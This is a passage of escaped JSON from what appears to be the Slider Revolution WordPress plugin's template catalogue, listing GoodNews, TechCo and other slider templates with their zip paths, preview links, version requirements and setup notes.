Header\",\"alias\":\"goodnewsheader\",\"zip\":\"packs\\/goodnewsheader.zip\",\"uid\":\"c6660b6bdbf596f38466f569596f5259\",\"img\":\"goodnewsheader\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/goodnews-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=goodnews-responsive-wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"GoodNews One-Pager\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"7\",\"installed\":false},\"145\":{\"id\":\"157\",\"title\":\"GoodNews Whats Hot\",\"alias\":\"goodnewswhatshot\",\"zip\":\"packs\\/goodnewswhatshot.zip\",\"uid\":\"cb841ce64a99a6644adab049cf5405cd\",\"img\":\"goodnewswhatshot\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/goodnews-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=goodnews-responsive-wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"GoodNews One-Pager\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"7\",\"installed\":false},\"146\":{\"id\":\"158\",\"title\":\"GoodNews Featured\",\"alias\":\"goodnewsfeatured\",\"zip\":\"packs\\/goodnewsfeatured.zip\",\"uid\":\"00bde4b09e3700da7183999eaf137ccc\",\"img\":\"goodnewsfeatured\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/goodnews-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=goodnews-responsive-wordpress-theme\",\"version\":\"1.0.3\",\"required\":\"6.4.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"GoodNews One-Pager\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"7\",\"installed\":false},\"147\":{\"id\":\"159\",\"title\":\"GoodNews Spotlight\",\"alias\":\"goodnewsspotlight\",\"zip\":\"packs\\/goodnewsspotlight.zip\",\"uid\":\"138076241a828e1c5764379944755f2b\",\"img\":\"goodnewsspotlight\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/goodnews-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=goodnews-responsive-wordpress-theme\",\"version\":\"1.0.4\",\"required\":\"6.4.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"GoodNews One-Pager\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"7\",\"installed\":false},\"148\":{\"id\":\"160\",\"title\":\"GoodNews Carousel\",\"alias\":\"goodnewscarousel\",\"zip\":\"packs\\/goodnewscarousel.zip\",\"uid\":\"d29d4460a6015e30d08d2714232d3768\",\"img\":\"goodnewscarousel\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/goodnews-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=goodnews-responsive-wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"GoodNews One-Pager\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"7\",\"installed\":false},\"149\":{\"id\":\"161\",\"title\":\"GoodNews Callout\",\"alias\":\"goodnewscallout\",\"zip\":\"packs\\/goodnewscallout.zip\",\"uid\":\"d9568b3193e96577fae630b3a6728785\",\"img\":\"goodnewscallout\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/goodnews-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=goodnews-responsive-wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"GoodNews One-Pager\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"7\",\"installed\":false},\"150\":{\"id\":\"162\",\"title\":\"GoodNews Footer\",\"alias\":\"goodnewsfooter\",\"zip\":\"packs\\/goodnewsfooter.zip\",\"uid\":\"34f43f891cb8d55375149dc4bbc38298\",\"img\":\"goodnewsfooter\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/goodnews-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=goodnews-responsive-wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"GoodNews One-Pager\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"7\",\"installed\":false},\"151\":{\"id\":\"163\",\"title\":\"GoodNews Content Page Package\",\"alias\":\"goodnews-content-page-package\",\"zip\":\"\",\"uid\":\"goodnews-content-page-package\",\"img\":\"packages\\/templatepack_goodnews_content_page_package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/goodnews-responsive-wordpress-theme-content\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=goodnews-responsive-wordpress-theme-content\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"GoodNews Content Page\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"8\",\"installed\":false},\"152\":{\"id\":\"164\",\"title\":\"GoodNews Menu Back\",\"alias\":\"goodnewsmenuback\",\"zip\":\"packs\\/goodnewsmenuback.zip\",\"uid\":\"1340d1aeefba497a7d404d12a1fceed4\",\"img\":\"goodnewsmenuback\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/goodnews-responsive-wordpress-theme-content\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=goodnews-responsive-wordpress-theme-content\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"GoodNews Content Page\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"8\",\"installed\":false},\"153\":{\"id\":\"165\",\"title\":\"GoodNews Blog Header\",\"alias\":\"goodnewsblogheader\",\"zip\":\"packs\\/goodnewsblogheader.zip\",\"uid\":\"abc4d7c1e48475c6def05f1f6d8bf564\",\"img\":\"goodnewsblogheader\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/goodnews-responsive-wordpress-theme-content\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=goodnews-responsive-wordpress-theme-content\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"GoodNews Content Page\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"8\",\"installed\":false},\"154\":{\"id\":\"166\",\"title\":\"GoodNews Blog Content\",\"alias\":\"goodnewsblogcontent\",\"zip\":\"packs\\/goodnewsblogcontent.zip\",\"uid\":\"bbf34563da6db2779c29599b503b07e9\",\"img\":\"goodnewsblogcontent\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/goodnews-responsive-wordpress-theme-content\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=goodnews-responsive-wordpress-theme-content\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"GoodNews Content Page\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"8\",\"installed\":false},\"155\":{\"id\":\"167\",\"title\":\"GoodNews Testimonials\",\"alias\":\"goodnewstestimonials\",\"zip\":\"packs\\/goodnewstestimonials.zip\",\"uid\":\"606b7336e86f69c567542d3f43712b56\",\"img\":\"goodnewstestimonials\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/goodnews-responsive-wordpress-theme-content\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=goodnews-responsive-wordpress-theme-content\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"GoodNews Content Page\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"8\",\"installed\":false},\"156\":{\"id\":\"168\",\"title\":\"GoodNews Blog Footer\",\"alias\":\"goodnewsblogfooter\",\"zip\":\"packs\\/goodnewsblogfooter.zip\",\"uid\":\"1fb88aecfb116fde67ce8d52bd3b5f05\",\"img\":\"goodnewsblogfooter\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/goodnews-responsive-wordpress-theme-content\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=goodnews-responsive-wordpress-theme-content\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"GoodNews Content Page\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"8\",\"installed\":false},\"157\":{\"id\":\"169\",\"title\":\"Before After Slider\",\"alias\":\"beforeafterslider\",\"zip\":\"beforeafterslider.zip\",\"uid\":\"6e615091a1fc3037c24b985ce5136fb2\",\"img\":\"beforeafterslider\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/before-after-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=before-after-slider\",\"version\":\"1.0.0\",\"required\":\"5.4.3.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This is the example slider for our Before \\/ After Add-On that allows you to create unique presentations with a comparing functionality.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">How to install <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\\\" target=\\\"_blank\\\">Add-Ons<\\/a>.<\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-beforeafter-addon\\\\\\/revslider-beforeafter-addon.php\\\",\\\"name\\\":\\\"Before After AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"158\":{\"id\":\"170\",\"title\":\"Product Showcase\",\"alias\":\"productshowcase\",\"zip\":\"productshowcase.zip\",\"uid\":\"a43447670260aaa7e8ff66cedfddb57a\",\"img\":\"productshowcase\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-product-showcase-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-product-showcase-slider\",\"version\":\"1.0.0\",\"required\":\"5.4.5\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Looking to sell products effectively? Our product showcase slider is just what you are looking for!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"159\":{\"id\":\"171\",\"title\":\"Overexposure Transition\",\"alias\":\"overexposuretransition\",\"zip\":\"overexposuretransition.zip\",\"uid\":\"13f16bbe6c6d646c7d0cb817a0d3d181\",\"img\":\"overexposuretransition\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/overexposure-transition-effect\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=overexposure-transition-effect\",\"version\":\"1.0.0\",\"required\":\"5.4.5\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Subtle overexposure transitions and smooth color fade effects make this slider stand out.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">How to install <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\\\" target=\\\"_blank\\\">Add-Ons<\\/a>.<\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"160\":{\"id\":\"172\",\"title\":\"Parallax Scroll\",\"alias\":\"parallaxscroll\",\"zip\":\"parallaxscroll.zip\",\"uid\":\"82546ee2f6af6c6682852f495109b3c3\",\"img\":\"parallaxscroll\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/parallax-scroll\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=parallax-scroll\",\"version\":\"1.0.0\",\"required\":\"5.4.5\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A strikingly colourful header for your website with super smooth parallax effects.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"161\":{\"id\":\"173\",\"title\":\"TechCo One-Pager Package\",\"alias\":\"techco-one-pager-package\",\"zip\":\"\",\"uid\":\"techco-one-pager-package\",\"img\":\"packages\\/techco_overview.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/techco-one-page-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=techco-one-page-wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"6.1.6\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"TechCo One-Pager\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"9\",\"installed\":false},\"162\":{\"id\":\"174\",\"title\":\"TechCo Menu\",\"alias\":\"techco-menu\",\"zip\":\"packs\\/techco-menu.zip\",\"uid\":\"55e5efee828cdf1ff7e2d3b90a301ea9\",\"img\":\"techco-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/techco-one-page-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=techco-one-page-wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual 